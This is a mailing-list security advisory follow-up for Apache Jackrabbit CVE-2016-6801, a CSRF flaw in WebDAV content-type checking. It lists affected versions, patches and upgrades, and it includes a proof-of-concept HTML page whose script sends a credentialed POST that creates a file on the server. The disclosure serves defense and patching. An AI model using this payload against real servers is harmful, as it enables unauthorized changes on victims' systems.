Re: CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Wed, 14 Sep 2016 05:58:16 -0700 

Following up on this...
There was some confusion inside the project team whether this issue requires a CVE (there were similar issues in the past where we didn't issue one, after all) - that's why we initially treated this as regular bug (see JCR-4002 and JCR-4009). 

That said, the bug is fixed in trunk, 2.13.3, 2.12.4, and 2.10.4.


The 2.8.x, 2.6.x, and 2.4.x branches have been fixed as well, and 
releases are being prepared right now.



(Reminder: prior releases have been end-of-lifed and do not receive 
fixes anymore)



While preparing the releases for 2.6 and 2.4 I also noticed that their 
last releases predate a security fix we made last year 
(https://issues.apache.org/jira/browse/JCR-3883), so anybody who's still 
using 2.4 or 2.6 and did *not* apply the fixes as described back then 
really needs to do this right now, or use the upcoming releases of 2.4 
and 2.6.


Best regards, Julian



On 2016-09-14 14:34, Julian Reschke wrote:

CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2

Description:
The CSRF content-type check for POST requests does not handle missing
Content-Type header fields, nor variations in field values with respect
to upper/lower case or optional parameters. This can be exploited to
create a resource via CSRF.

Mitigation:
2.4.x users upgrade to 2.4.5 and apply the patch in
http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released
2.6.x users upgrade to 2.6.5 and apply the patch in
http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released
2.8.x users upgrade to 2.8.2 and apply the patch in
http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released
2.10.x users should upgrade to 2.10.4
2.12.x users should upgrade to 2.12.4
2.13.x users should upgrade to 2.13.3

Example:
A resource can be created like so:
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
        xhr.withCredentials = true;
        var body = "This file has been uploaded via CSRF.=\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request"
onclick="submitRequest();" />
    </form>
  </body>
</html>

Credit:
This issue was discovered by Lukas Reschke.

























					Reply via email to